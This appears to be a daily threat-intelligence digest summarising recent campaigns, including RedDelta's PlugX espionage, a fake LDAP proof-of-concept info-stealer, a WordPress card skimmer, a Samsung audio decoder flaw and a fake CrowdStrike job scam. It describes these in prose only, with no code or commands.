China-linked RedDelta has intensified its cyber-espionage activities across Asia, targeting government and political entities across multiple countries. The group used sophisticated spear-phishing tactics to deliver a modified PlugX backdoor. Notable breaches include the Mongolian Ministry of Defense and the Communist Party of Vietnam, underscoring RedDelta’s evolving methods and broad geographical reach.

In a deceptive twist, threat actors have created a fake PoC exploit tied to a patched Microsoft Windows LDAP vulnerability to lure security researchers. The malicious PoC, hosted on a repository, drops a PowerShell script upon execution, stealing computer information and sending it to an external FTP server.

CrowdStrike uncovered a phishing scheme where attackers impersonated the company, offering fake job opportunities to lure victims. Targets were directed to download a fraudulent CRM application, which bypassed sandbox checks to install a Monero miner. The malware operated stealthily in the background, ensuring persistence through startup scripts and registry entries.

Top Malware Reported in the Last 24 Hours

RedDelta drops PlugX, targets Taiwan

Mongolia, Taiwan, Myanmar, Vietnam, and Cambodia have been targeted by a China-linked threat actor called RedDelta to deliver a modified version of the PlugX backdoor between July 2023 and December 2024. RedDelta reportedly compromised the Mongolian Ministry of Defense in August 2024 and the Communist Party of Vietnam in November 2024. They also targeted victims in Malaysia, Japan, the U.S., Ethiopia, Brazil, Australia, and India from September to December 2024. Known for refining its infection methods, RedDelta has used Windows files as part of spear-phishing attacks to deploy PlugX through various techniques. 

Credit card skimmer targets WP checkout pages

Sucuri discovered a sophisticated credit card skimmer malware targeting WordPress websites. The malware operates by injecting malicious JavaScript into the WordPress database, allowing it to steal sensitive payment details from checkout pages. It creates fake payment forms or hijacks existing ones to capture users' credit card information, which is then encoded, encrypted, and sent to a remote server controlled by attackers. 

Fake PoC deploys info-stealer

Threat actors have developed a fake PoC exploit targeting a critical Microsoft vulnerability to trick security researchers into downloading information stealing malware. This fake PoC is linked to a vulnerability in Microsoft’s Windows LDAP, which was patched in December 2024. Attackers created a malicious repository hosting the fake PoC, which, when run, drops a PowerShell script that creates a Scheduled Job, collects computer information, and uploads data to an external FTP server.

Top Vulnerabilities Reported in the Last 24 Hours

Zero-click exploit targets Samsung devices

Cybersecurity researchers disclosed a patched security flaw affecting Monkey's Audio (APE) decoder on Samsung smartphones, posing a risk of code execution. The vulnerability, tracked as CVE-2024-49415, impacts devices running Android versions 12, 13, and 14. The flaw can be exploited without user interaction under specific conditions, such as when Google Messages is set up for rich communication services. The issue arises from the decoding of incoming audio, potentially leading to a buffer overflow and causing the media codec process to crash.

Top Scams Reported in the Last 24 Hours

Fake job offer spreads Monero miner

CrowdStrike has detected a phishing campaign impersonating the company with fake job offer emails. The emails direct targets to download a fake "employee CRM application" from a malicious website designed to look like CrowdStrike's portal. If the target passes sandbox checks, the application tricks them into installing a Monero cryptocurrency miner. The miner runs in the background to avoid detection, and persistence is achieved through a startup script and registry entry.